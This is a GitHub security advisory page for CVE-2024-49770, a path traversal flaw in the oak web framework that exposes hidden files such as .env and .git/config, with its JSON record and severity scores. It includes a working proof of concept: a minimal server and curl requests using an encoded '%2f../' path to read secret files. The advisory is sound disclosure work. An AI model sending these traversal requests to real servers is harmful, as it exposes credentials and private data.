GHSA-QM92-93FV-VH7M

Vulnerability from github – Published: 2024-11-01 21:37 – Updated: 2024-11-01 21:37
VLAI?
Summary
Path traversal in oak allows transfer of hidden files within the served root directory
Details

Summary

By default oak does not allow transferring of hidden files with Context.send API. However, this can be bypassed by encoding / as its URL encoded form %2F.

Details

1.) Oak uses decodeComponent which seems to be unexpected. This is also the reason why it is not possible to access a file that contains URL encoded characters unless the client URL encodes it first.

2.) The function isHidden is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from subdir/.env.

PoC

// server.ts

import { Application } from "jsr:@oak/oak@17.1.2";

const app = new Application();

app.use(async (context, next) => {
  try {
    await context.send({
      root: './root',
      hidden: false, // default
    });
  } catch {
    await next();
  }
});

await app.listen({ port: 8000 });

In terminal:

# setup root directory
mkdir root/.git
echo SECRET_KEY=oops > root/.env
echo oops >  root/.git/config

# start server
deno run -A server.ts

# in another terminal
curl -D- http://127.0.0.1:8000/poc%2f../.env
curl -D- http://127.0.0.1:8000/poc%2f../.git/config

Impact

For an attacker this has potential to read sensitive user data or to gain access to server secrets.

Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@oakserver/oak"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "14.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-49770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-35"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-01T21:37:10Z",
    "nvd_published_at": "2024-11-01T17:15:17Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nBy default `oak` does not allow transferring of hidden files with `Context.send` API. However, this can be bypassed by\nencoding `/` as its URL encoded form `%2F`.\n\n### Details\n\n1.) Oak uses [decodeComponent](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25) which seems to be unexpected. This is also the reason why it is not possible to access a file that\ncontains URL encoded characters unless the client URL encodes it first.\n\n2.) The function [isHidden](https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125) is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from `subdir/.env`.\n\n### PoC\n\n```ts\n// server.ts\n\nimport { Application } from \"jsr:@oak/oak@17.1.2\";\n\nconst app = new Application();\n\napp.use(async (context, next) =\u003e {\n  try {\n    await context.send({\n      root: \u0027./root\u0027,\n      hidden: false, // default\n    });\n  } catch {\n    await next();\n  }\n});\n\nawait app.listen({ port: 8000 });\n```\n\nIn terminal:\n\n```bash\n# setup root directory\nmkdir root/.git\necho SECRET_KEY=oops \u003e root/.env\necho oops \u003e  root/.git/config\n\n# start server\ndeno run -A server.ts\n\n# in another terminal\ncurl -D- http://127.0.0.1:8000/poc%2f../.env\ncurl -D- http://127.0.0.1:8000/poc%2f../.git/config\n```\n\n### Impact\n\nFor an attacker this has potential to read sensitive user data or to gain access to server secrets.\n",
  "id": "GHSA-qm92-93fv-vh7m",
  "modified": "2024-11-01T21:37:10Z",
  "published": "2024-11-01T21:37:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/security/advisories/GHSA-qm92-93fv-vh7m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49770"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/commit/4b2f27efd5cba5a45b2c3982e610da3af0869209"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/oakserver/oak"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Path traversal in oak allows transfer of hidden files within the served root directory"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.